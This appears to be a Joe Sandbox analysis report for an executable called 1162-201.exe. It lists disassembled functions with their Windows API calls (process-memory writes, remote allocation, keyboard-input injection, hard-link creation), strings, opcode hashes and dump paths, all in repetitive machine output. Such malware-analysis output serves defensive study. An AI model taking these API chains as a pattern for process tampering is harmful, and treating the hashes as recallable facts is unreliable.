                                                                      • API ID: __freea$_free
                                                                      • String ID: a/p$am/pm
                                                                      • API String ID: 3432400110-3206640213
                                                                      • Opcode ID: 57fbddcf6fac9872d618ce68da1f9be16913f50233e6cc9a335457ff2a151c66
                                                                      • Instruction ID: 8200fdc860db1ebf36e024221dc27c4da8a9ae564bc36e13b413b450d38a4c38
                                                                      • Opcode Fuzzy Hash: 57fbddcf6fac9872d618ce68da1f9be16913f50233e6cc9a335457ff2a151c66
                                                                      • Instruction Fuzzy Hash: C1D1F339900246DACB249F69C86DBBEB7B0FF05702F2C0159ED219B661D3359EC8CB59
                                                                      APIs
                                                                        • Part of subcall function 00C40242: EnterCriticalSection.KERNEL32(00CF070C,00CF1884,?,?,00C3198B,00CF2518,?,?,?,00C212F9,00000000), ref: 00C4024D
                                                                        • Part of subcall function 00C40242: LeaveCriticalSection.KERNEL32(00CF070C,?,00C3198B,00CF2518,?,?,?,00C212F9,00000000), ref: 00C4028A
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                        • Part of subcall function 00C400A3: __onexit.LIBCMT ref: 00C400A9
                                                                      • __Init_thread_footer.LIBCMT ref: 00CA7BFB
                                                                        • Part of subcall function 00C401F8: EnterCriticalSection.KERNEL32(00CF070C,?,?,00C38747,00CF2514), ref: 00C40202
                                                                        • Part of subcall function 00C401F8: LeaveCriticalSection.KERNEL32(00CF070C,?,00C38747,00CF2514), ref: 00C40235
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                      • String ID: 5$G$Variable must be of type 'Object'.
                                                                      • API String ID: 535116098-3733170431
                                                                      • Opcode ID: 1be8c5c631b979465d52f741129060185fe02ddf6cdc1393a514c0e80a60967f
                                                                      • Instruction ID: e57555218613fc021f4ea0d3c51cb577b50df93a4dc0164ed5a8aa3d0557da14
                                                                      • Opcode Fuzzy Hash: 1be8c5c631b979465d52f741129060185fe02ddf6cdc1393a514c0e80a60967f
                                                                      • Instruction Fuzzy Hash: 2091AC70A0420AEFCB14EF94D891DBDB7B1FF4A308F108159F8169B292DB71AE45DB51
                                                                      APIs
                                                                        • Part of subcall function 00C8B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C821D0,?,?,00000034,00000800,?,00000034), ref: 00C8B42D
                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C82760
                                                                        • Part of subcall function 00C8B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C821FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00C8B3F8
                                                                        • Part of subcall function 00C8B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00C8B355
                                                                        • Part of subcall function 00C8B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C82194,00000034,?,?,00001004,00000000,00000000), ref: 00C8B365
                                                                        • Part of subcall function 00C8B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C82194,00000034,?,?,00001004,00000000,00000000), ref: 00C8B37B
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C827CD
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C8281A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      • API String ID: 4150878124-2766056989
                                                                      • Opcode ID: 1e2cba21dfdfd25aeef0149a4273950440a0e8e37135c695d476f6ef76b61441
                                                                      • Instruction ID: 08a186a50396027fcbce642f3c923d29e2735ecdc3354602cbb11d1e35219dc0
                                                                      • Opcode Fuzzy Hash: 1e2cba21dfdfd25aeef0149a4273950440a0e8e37135c695d476f6ef76b61441
                                                                      • Instruction Fuzzy Hash: 35413C72900218BFDB10EBA4CD86BEEBBB8AF09304F004059FA55B7191DB706E45DBA0
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\1162-201.exe,00000104), ref: 00C51769
                                                                      • _free.LIBCMT ref: 00C51834
                                                                      • _free.LIBCMT ref: 00C5183E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _free$FileModuleName
                                                                      • String ID: C:\Users\user\Desktop\1162-201.exe
                                                                      • API String ID: 2506810119-2769687655
                                                                      • Opcode ID: 45f80e817b811bbb32b91ca53948c0ba399a16164ff13af3e638104d1be3a88a
                                                                      • Instruction ID: 583e65ce548ff54fba9f8a4f5f60501bbe8621e0f3a07fcb54ebec54ba36e82b
                                                                      • Opcode Fuzzy Hash: 45f80e817b811bbb32b91ca53948c0ba399a16164ff13af3e638104d1be3a88a
                                                                      • Instruction Fuzzy Hash: F631C279A00218EFCB21DF99DC88FAEBBFCEB89351B184166FC1097211D6704E84DB94
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C8C306
                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00C8C34C
                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CF1990,00F54868), ref: 00C8C395
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem
                                                                      • String ID: 0
                                                                      • API String ID: 135850232-4108050209
                                                                      • Opcode ID: 8ab16d83ec5ca79354d68259b71b27f9285d27aad7b228416bed62541359ffb1
                                                                      • Instruction ID: b72f24847629e6b305b1a0d47d9ae9d2a6eeb05f77d4d9b7955477161648c0b4
                                                                      • Opcode Fuzzy Hash: 8ab16d83ec5ca79354d68259b71b27f9285d27aad7b228416bed62541359ffb1
                                                                      • Instruction Fuzzy Hash: 3141A2312043019FD720EF25D8C5B9ABBE4EF85318F14861EF9A5972E1D730E905DB66
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                      • API String ID: 176396367-2734436370
                                                                      • Opcode ID: e2b11ca72a11a041d65151f5ceb7c41d277c98603a65f8f6e17dd08007460cd7
                                                                      • Instruction ID: 1152486669d2a52b377487f02c82876c91d3aa8f13a0bd50849e79c8a1dd4eaf
                                                                      • Opcode Fuzzy Hash: e2b11ca72a11a041d65151f5ceb7c41d277c98603a65f8f6e17dd08007460cd7
                                                                      • Instruction Fuzzy Hash: C8213832204520A6C331BA259C02FBB7398EF51308F18403AF95997141FB719E46D399
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C94A08
                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C94A5C
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,00CBCC08), ref: 00C94AD0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume
                                                                      • String ID: %lu
                                                                      • API String ID: 2507767853-685833217
                                                                      • Opcode ID: 755af88ccea3dac25f414996c642bd0847bdaaa6476e82a6de67784ff28f4b5f
                                                                      • Instruction ID: b632729fcaa4ebdc4184192042ab5c95c59fee3dce088eb547f63f51305c0578
                                                                      • Opcode Fuzzy Hash: 755af88ccea3dac25f414996c642bd0847bdaaa6476e82a6de67784ff28f4b5f
                                                                      • Instruction Fuzzy Hash: 3A316171A00108AFDB10DF54C885EAE7BF8EF04308F1440A5F905EB252DB71EE46DB61
                                                                      APIs
                                                                        • Part of subcall function 00C26B57: _wcslen.LIBCMT ref: 00C26B6A
                                                                        • Part of subcall function 00C82DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C82DC5
                                                                        • Part of subcall function 00C82DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C82DD6
                                                                        • Part of subcall function 00C82DA7: GetCurrentThreadId.KERNEL32 ref: 00C82DDD
                                                                        • Part of subcall function 00C82DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C82DE4
                                                                      • GetFocus.USER32 ref: 00C82F78
                                                                        • Part of subcall function 00C82DEE: GetParent.USER32(00000000), ref: 00C82DF9
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00C82FC3
                                                                      • EnumChildWindows.USER32(?,00C8303B), ref: 00C82FEB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                      • String ID: %s%d
                                                                      • API String ID: 1272988791-1110647743
                                                                      • Opcode ID: 4df6a50dfb6eada78930b0ba2ea5f56304c966a66f1e646d8a95c937842ec579
                                                                      • Instruction ID: 41d9cab23e5ebb749590e3a49f4440735d70c767bc3a0e836db79ad679b33f41
                                                                      • Opcode Fuzzy Hash: 4df6a50dfb6eada78930b0ba2ea5f56304c966a66f1e646d8a95c937842ec579
                                                                      • Instruction Fuzzy Hash: 9011AF756002056BCF157F609CC9FEE3B6AAF94708F04507AF9099B292DF309A49EB74
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4bfc75a902bf94f212be07ba9b7b8e86d352def20b5b45c693d6a2f1751718df
                                                                      • Instruction ID: 8970e6eec0366e84c36c7a018a5cdac31f949e0dc93f93932e03d5dc575a240f
                                                                      • Opcode Fuzzy Hash: 4bfc75a902bf94f212be07ba9b7b8e86d352def20b5b45c693d6a2f1751718df
                                                                      • Instruction Fuzzy Hash: D6C17D75A00206EFDB54DF94C888BAEB7B5FF48318F218598E415EB261C770EE85CB94
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: __alldvrm$_strrchr
                                                                      • String ID:
                                                                      • API String ID: 1036877536-0
                                                                      • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                      • Instruction ID: 0cc9959e3afb0dc990c6e2cfaf2cdb24a7291ec58918b1334c3e2cbc5a76df86
                                                                      • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                      • Instruction Fuzzy Hash: F5A1AB79D007869FD729CF18C8817AEBBE4EF61385F2841ADED559B281C2348EC9C758
                                                                      APIs
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CBFC08,?), ref: 00C805F0
                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CBFC08,?), ref: 00C80608
                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,00CBCC40,000000FF,?,00000000,00000800,00000000,?,00CBFC08,?), ref: 00C8062D
                                                                      • _memcmp.LIBVCRUNTIME ref: 00C8064E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                      • String ID:
                                                                      • API String ID: 314563124-0
                                                                      • Opcode ID: c0f42c8a25fa9642215acdf43f14ae0ed49dbace416c8308281de3d9ffed5525
                                                                      • Instruction ID: 2d447f4610de215ed31724cd7b8c18a1ae88cdd4d254f9f52d9f7b96f9ec5a2f
                                                                      • Opcode Fuzzy Hash: c0f42c8a25fa9642215acdf43f14ae0ed49dbace416c8308281de3d9ffed5525
                                                                      • Instruction Fuzzy Hash: BA814B71A00109EFCB44DF94C988EEEB7B9FF89315F204158F516AB250DB71AE0ACB64
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: c8face580194e9d2e66050003c0414b6928fdd3653c27cd1af8a1cebba277054
                                                                      • Instruction ID: a7001e6c995b1d305ac1ae2af2c01525e1ac49643df84597e45a1c2a3392f30d
                                                                      • Opcode Fuzzy Hash: c8face580194e9d2e66050003c0414b6928fdd3653c27cd1af8a1cebba277054
                                                                      • Instruction Fuzzy Hash: C4412C35900110ABDB317BB98CC66BE3AA4FF41372F1C4225FC29D7291EA748A417272
                                                                      APIs
                                                                      • GetWindowRect.USER32(00F5DC60,?), ref: 00CB62E2
                                                                      • ScreenToClient.USER32(?,?), ref: 00CB6315
                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00CB6382
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientMoveRectScreen
                                                                      • String ID:
                                                                      • API String ID: 3880355969-0
                                                                      • Opcode ID: c6a598d314ebf808d2a0bd756dbcc02080a0c302c284f950a9c04a58805d03db
                                                                      • Instruction ID: d25de83d15725a21196ab2f33f17bc4bed8de9084787cc8d26fe26fc78cae2ed
                                                                      • Opcode Fuzzy Hash: c6a598d314ebf808d2a0bd756dbcc02080a0c302c284f950a9c04a58805d03db
                                                                      • Instruction Fuzzy Hash: 3D512B74900209EFDF10DF58D880AEE7BF5EB55360F148269F925972A0D734EE41CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2fb72f3cc61660019e7d9849559d85fe7220ceab715afbccc7e689121e6bcdc0
                                                                      • Instruction ID: 5b73f3e190ebf00ccba6c670a20126f8f9b73d109ec7c9a11ff5fbaaad733bd5
                                                                      • Opcode Fuzzy Hash: 2fb72f3cc61660019e7d9849559d85fe7220ceab715afbccc7e689121e6bcdc0
                                                                      • Instruction Fuzzy Hash: 25412879A00314AFD7349F38CC41BAABFE9EB88711F20452EF911DB281D3719D859794
                                                                      APIs
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C95783
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00C957A9
                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C957CE
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C957FA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 3321077145-0
                                                                      • Opcode ID: 40c32c6f53f491a892a3ec2325f8e53f863a2663b668f44207f571d6f4f74a1d
                                                                      • Instruction ID: 48bd66e3202c51e8eb8790ef0e1fb071e95e22f3edf5d2a95d177443444763fa
                                                                      • Opcode Fuzzy Hash: 40c32c6f53f491a892a3ec2325f8e53f863a2663b668f44207f571d6f4f74a1d
                                                                      • Instruction Fuzzy Hash: 6E412F35600610DFCF11EF55D584A5EBBE1EF89320B198498E85AAF762CB34FD40DB91
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00C46D71,00000000,00000000,00C482D9,?,00C482D9,?,00000001,00C46D71,8BE85006,00000001,00C482D9,00C482D9), ref: 00C5D910
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C5D999
                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00C5D9AB
                                                                      • __freea.LIBCMT ref: 00C5D9B4
                                                                        • Part of subcall function 00C53820: RtlAllocateHeap.NTDLL(00000000,?,00CF1444,?,00C3FDF5,?,?,00C2A976,00000010,00CF1440,00C213FC,?,00C213C6,?,00C21129), ref: 00C53852
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                      • String ID:
                                                                      • API String ID: 2652629310-0
                                                                      • Opcode ID: b5cca259d5b6c4ca5fe50e36246da934a75ba6e1515b392ea1c207a3f67d3bc9
                                                                      • Instruction ID: 5eaeac83cd4f4171ac8c3472825f0a67a89cf300ee86ffc21f0e855871dccfc7
                                                                      • Opcode Fuzzy Hash: b5cca259d5b6c4ca5fe50e36246da934a75ba6e1515b392ea1c207a3f67d3bc9
                                                                      • Instruction Fuzzy Hash: 7531EE72A1030AABDF24DF64DC81EAE7BA5EB41311F050268FC15E6151EB35CE98DB90
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00C8AAAC
                                                                      • SetKeyboardState.USER32(00000080), ref: 00C8AAC8
                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00C8AB36
                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00C8AB88
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: 0d836a337aab5cc15887da3af79cb37af193ab536009790a7e104dff7be27775
                                                                      • Instruction ID: 439ed3f6b0096a23c17c570907a70504b5f0b538a9dd66a0ba84324a12320b96
                                                                      • Opcode Fuzzy Hash: 0d836a337aab5cc15887da3af79cb37af193ab536009790a7e104dff7be27775
                                                                      • Instruction Fuzzy Hash: 57313970A40218AFFF35EB65CC45BFE7BAAAB44318F04421BF0A1561D0D3758E81D76A
                                                                      APIs
